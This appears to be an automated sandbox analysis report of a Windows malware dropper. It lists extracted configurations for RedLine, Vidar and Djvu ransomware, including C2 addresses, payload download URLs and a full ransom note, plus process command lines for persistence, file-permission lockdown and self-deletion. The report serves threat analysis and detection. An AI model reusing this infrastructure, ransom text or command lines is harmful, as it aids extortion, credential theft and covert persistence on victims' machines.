Analysis
-
max time kernel
83s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2022 15:52
Static task
static1
Behavioral task
behavioral1
Sample
797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe
Resource
win10v2004-20220812-en
General
-
Target
797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe
-
Size
172KB
-
MD5
2c1c98563468777f8212368893e1f73a
-
SHA1
2cacdbafdd0568d8c7f6e755b7c16466f724eea3
-
SHA256
797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894
-
SHA512
14dfb0a2060ee58a7521c5b52f0b23fa649a32f2d0cf8b62fa1b4fd5f6f47b4f34c87ea0c0509328e59361326cf75cc679ddf48b85df8e322914ecff8f2240a3
-
SSDEEP
3072:RSSBfF+LxhNlTj/xRXT6JgC/BPlwE8Agr43t8gSRt9:AHLxhNlTzX+JPlfgr499SRf
Malware Config
Extracted
redline
mario23_10
167.235.252.160:10642
-
auth_value
eca57cfb5172f71dc45986763bb98942
Extracted
djvu
http://fresherlights.com/lancer/get.php
-
extension
.fate
-
offline_id
5IRhyFuF3rXlXBvF6jAWjHEAnAb432icDCcvZyt1
-
payload_url
http://uaery.top/dl/build2.exe
http://fresherlights.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-4wOUlYSwGo Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@fishmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0603Jhyjd
Extracted
vidar
55.6
517
https://t.me/seclab_new
https://mas.to/@ofadex
-
profile_id
517
Extracted
redline
new1113
jalocliche.xyz:81
chardhesha.xyz:81
-
auth_value
bce8d71b3146db7b78f06ec6ae28bdd9
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Signatures
-
Detected Djvu ransomware 10 IoCs
Processes:
resource yara_rule behavioral1/memory/988-182-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/988-184-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/988-186-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1648-187-0x0000000002310000-0x000000000242B000-memory.dmp family_djvu behavioral1/memory/988-196-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/988-203-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2940-210-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2940-208-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2940-215-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2940-238-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2764-133-0x00000000022C0000-0x00000000022C9000-memory.dmp family_smokeloader behavioral1/memory/3148-162-0x00000000006E0000-0x00000000006E9000-memory.dmp family_smokeloader behavioral1/memory/3652-168-0x00000000005C0000-0x00000000005C9000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2468-140-0x0000000000400000-0x0000000000460000-memory.dmp family_redline behavioral1/memory/3148-334-0x0000000000A00000-0x0000000000A28000-memory.dmp family_redline behavioral1/memory/3660-403-0x0000000000B20000-0x0000000000B48000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
57AE.exeBrowserUpdate.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 57AE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BrowserUpdate.exe -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
Processes:
BF1E.exeC1DF.exeC2F9.exeC646.exeC7FC.exeD2EB.exeD2EB.exeD2EB.exeD2EB.exebuild2.exebuild2.exebuild3.exe310A.exemstsca.exe406C.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe57AE.exe626D.exeBrowser Update.exe6770.exeBrowserUpdate.exeminer2.exe852A.exe8932.exepid process 4092 BF1E.exe 3148 C1DF.exe 2248 C2F9.exe 3652 C646.exe 3676 C7FC.exe 1648 D2EB.exe 988 D2EB.exe 3484 D2EB.exe 2940 D2EB.exe 3300 build2.exe 2192 build2.exe 3172 build3.exe 1164 310A.exe 4320 mstsca.exe 636 406C.exe 1248 EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe 4496 LYKAA.exe 2752 57AE.exe 4700 626D.exe 3260 Browser Update.exe 2540 6770.exe 1908 BrowserUpdate.exe 4932 miner2.exe 2488 852A.exe 4852 8932.exe -
Possible privilege escalation attempt 3 IoCs
Processes:
icacls.exetakeown.exeicacls.exepid process 1716 icacls.exe 3276 takeown.exe 944 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1984-407-0x0000000000400000-0x0000000000BEB000-memory.dmp upx behavioral1/memory/1984-410-0x0000000000400000-0x0000000000BEB000-memory.dmp upx behavioral1/memory/1984-411-0x0000000000400000-0x0000000000BEB000-memory.dmp upx behavioral1/memory/1984-412-0x0000000000400000-0x0000000000BEB000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
BrowserUpdate.exe57AE.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BrowserUpdate.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BrowserUpdate.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 57AE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 57AE.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Browser Update.exeBrowserUpdate.exeD2EB.exebuild2.exe406C.exe626D.exeminer2.exeD2EB.exeLYKAA.exe57AE.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Browser Update.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation BrowserUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation D2EB.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 406C.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 626D.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation miner2.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation D2EB.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation LYKAA.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 57AE.exe -
Loads dropped DLL 4 IoCs
Processes:
regsvr32.exebuild2.exepid process 2136 regsvr32.exe 2136 regsvr32.exe 2192 build2.exe 2192 build2.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exetakeown.exepid process 944 icacls.exe 1716 icacls.exe 3276 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\57AE.exe themida behavioral1/memory/2752-290-0x0000000000BF0000-0x0000000001085000-memory.dmp themida behavioral1/memory/2752-291-0x0000000000BF0000-0x0000000001085000-memory.dmp themida behavioral1/memory/2752-292-0x0000000000BF0000-0x0000000001085000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\57AE.exe themida C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe themida C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe themida behavioral1/memory/1908-308-0x00000000007E0000-0x00000000011C6000-memory.dmp themida behavioral1/memory/1908-309-0x00000000007E0000-0x00000000011C6000-memory.dmp themida behavioral1/memory/2752-310-0x0000000000BF0000-0x0000000001085000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
D2EB.exeBrowser Update.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8c5ef99b-dbe7-400b-ab96-5850ccd27ad1\\D2EB.exe\" --AutoStart" D2EB.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Browser Update.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google LLC = "C:\\Program Files\\Google\\Chrome\\Application\\BrowserUpdate.exe -l google.sup1@yahoo.com" Browser Update.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
57AE.exeBrowserUpdate.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 57AE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BrowserUpdate.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 62 api.2ip.ua 230 ip-api.com 41 api.2ip.ua 45 api.2ip.ua 61 api.2ip.ua -
Suspicious use of SetThreadContext 5 IoCs
Processes:
BF1E.exeD2EB.exeD2EB.exebuild2.exe8932.exedescription pid process target process PID 4092 set thread context of 2468 4092 BF1E.exe AppLaunch.exe PID 1648 set thread context of 988 1648 D2EB.exe D2EB.exe PID 3484 set thread context of 2940 3484 D2EB.exe D2EB.exe PID 3300 set thread context of 2192 3300 build2.exe build2.exe PID 4852 set thread context of 3148 4852 8932.exe vbc.exe -
Drops file in Program Files directory 1 IoCs
Processes:
Browser Update.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe Browser Update.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 636 sc.exe 896 sc.exe 4724 sc.exe 2992 sc.exe 3712 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3264 2248 WerFault.exe C2F9.exe 944 3652 WerFault.exe C646.exe 5052 3676 WerFault.exe C7FC.exe 4300 2540 WerFault.exe 6770.exe 3224 1164 WerFault.exe 310A.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
C1DF.exe797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C1DF.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C1DF.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C1DF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2288 schtasks.exe 5036 schtasks.exe 2568 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1564 timeout.exe 3040 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 236 Go-http-client/1.1 -
Modifies registry class 3 IoCs
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 5036 reg.exe 444 reg.exe 1344 reg.exe 2804 reg.exe 4564 reg.exe 3676 reg.exe 3480 reg.exe 4472 reg.exe 3312 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exepid process 2764 797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe 2764 797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2348 -
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exeC1DF.exepid process 2764 797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe 2348 2348 2348 2348 3148 C1DF.exe 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 2348 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AppLaunch.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe626D.exe6770.exeminer2.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeDebugPrivilege 2468 AppLaunch.exe Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeDebugPrivilege 1248 EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe Token: SeDebugPrivilege 4496 LYKAA.exe Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeDebugPrivilege 4700 626D.exe Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeDebugPrivilege 2540 6770.exe Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeDebugPrivilege 4932 miner2.exe Token: SeDebugPrivilege 4624 powershell.exe Token: SeShutdownPrivilege 2348 Token: SeCreatePagefilePrivilege 2348 Token: SeShutdownPrivilege 2348 -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 2348 2348 -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
Browser Update.exeBrowserUpdate.exepid process 3260 Browser Update.exe 1908 BrowserUpdate.exe 1908 BrowserUpdate.exe 1908 BrowserUpdate.exe 1908 BrowserUpdate.exe 1908 BrowserUpdate.exe 1908 BrowserUpdate.exe 1908 BrowserUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
BF1E.exeregsvr32.exeD2EB.exeD2EB.exeD2EB.exeD2EB.exedescription pid process target process PID 2348 wrote to memory of 4092 2348 BF1E.exe PID 2348 wrote to memory of 4092 2348 BF1E.exe PID 2348 wrote to memory of 4092 2348 BF1E.exe PID 4092 wrote to memory of 2468 4092 BF1E.exe AppLaunch.exe PID 4092 wrote to memory of 2468 4092 BF1E.exe AppLaunch.exe PID 4092 wrote to memory of 2468 4092 BF1E.exe AppLaunch.exe PID 4092 wrote to memory of 2468 4092 BF1E.exe AppLaunch.exe PID 4092 wrote to memory of 2468 4092 BF1E.exe AppLaunch.exe PID 2348 wrote to memory of 3148 2348 C1DF.exe PID 2348 wrote to memory of 3148 2348 C1DF.exe PID 2348 wrote to memory of 3148 2348 C1DF.exe PID 2348 wrote to memory of 2248 2348 C2F9.exe PID 2348 wrote to memory of 2248 2348 C2F9.exe PID 2348 wrote to memory of 2248 2348 C2F9.exe PID 2348 wrote to memory of 3652 2348 C646.exe PID 2348 wrote to memory of 3652 2348 C646.exe PID 2348 wrote to memory of 3652 2348 C646.exe PID 2348 wrote to memory of 3676 2348 C7FC.exe PID 2348 wrote to memory of 3676 2348 C7FC.exe PID 2348 wrote to memory of 3676 2348 C7FC.exe PID 2348 wrote to memory of 2804 2348 regsvr32.exe PID 2348 wrote to memory of 2804 2348 regsvr32.exe PID 2804 wrote to memory of 2136 2804 regsvr32.exe regsvr32.exe PID 2804 wrote to memory of 2136 2804 regsvr32.exe regsvr32.exe PID 2804 wrote to memory of 2136 2804 regsvr32.exe regsvr32.exe PID 2348 wrote to memory of 1648 2348 D2EB.exe PID 2348 wrote to memory of 1648 2348 D2EB.exe PID 2348 wrote to memory of 1648 2348 D2EB.exe PID 2348 wrote to memory of 3060 2348 explorer.exe PID 2348 wrote to memory of 3060 2348 explorer.exe PID 2348 wrote to memory of 3060 2348 explorer.exe PID 2348 wrote to memory of 3060 2348 explorer.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 1648 wrote to memory of 988 1648 D2EB.exe D2EB.exe PID 2348 wrote to memory of 2252 2348 explorer.exe PID 2348 wrote to memory of 2252 2348 explorer.exe PID 2348 wrote to memory of 2252 2348 explorer.exe PID 988 wrote to memory of 1716 988 D2EB.exe icacls.exe PID 988 wrote to memory of 1716 988 D2EB.exe icacls.exe PID 988 wrote to memory of 1716 988 D2EB.exe icacls.exe PID 988 wrote to memory of 3484 988 D2EB.exe D2EB.exe PID 988 wrote to memory of 3484 988 D2EB.exe D2EB.exe PID 988 wrote to memory of 3484 988 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 3484 wrote to memory of 2940 3484 D2EB.exe D2EB.exe PID 2940 wrote to memory of 3300 2940 D2EB.exe build2.exe PID 2940 wrote to memory of 3300 2940 D2EB.exe build2.exe PID 2940 wrote to memory of 3300 2940 D2EB.exe build2.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe"C:\Users\Admin\AppData\Local\Temp\797b99a85de775fb174782c443122a3d7396403350487fbb125d76fd56a1a894.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\BF1E.exeC:\Users\Admin\AppData\Local\Temp\BF1E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C1DF.exeC:\Users\Admin\AppData\Local\Temp\C1DF.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\C2F9.exeC:\Users\Admin\AppData\Local\Temp\C2F9.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 3402⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\C646.exeC:\Users\Admin\AppData\Local\Temp\C646.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2248 -ip 22481⤵
-
C:\Users\Admin\AppData\Local\Temp\C7FC.exeC:\Users\Admin\AppData\Local\Temp\C7FC.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3652 -ip 36521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3676 -ip 36761⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\CFEC.dll1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\CFEC.dll2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\D2EB.exeC:\Users\Admin\AppData\Local\Temp\D2EB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D2EB.exeC:\Users\Admin\AppData\Local\Temp\D2EB.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8c5ef99b-dbe7-400b-ab96-5850ccd27ad1" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\D2EB.exe"C:\Users\Admin\AppData\Local\Temp\D2EB.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D2EB.exe"C:\Users\Admin\AppData\Local\Temp\D2EB.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build2.exe"C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build2.exe"C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build2.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build2.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build3.exe"C:\Users\Admin\AppData\Local\f38c16c0-da30-4285-9b5b-abface195d64\build3.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"6⤵
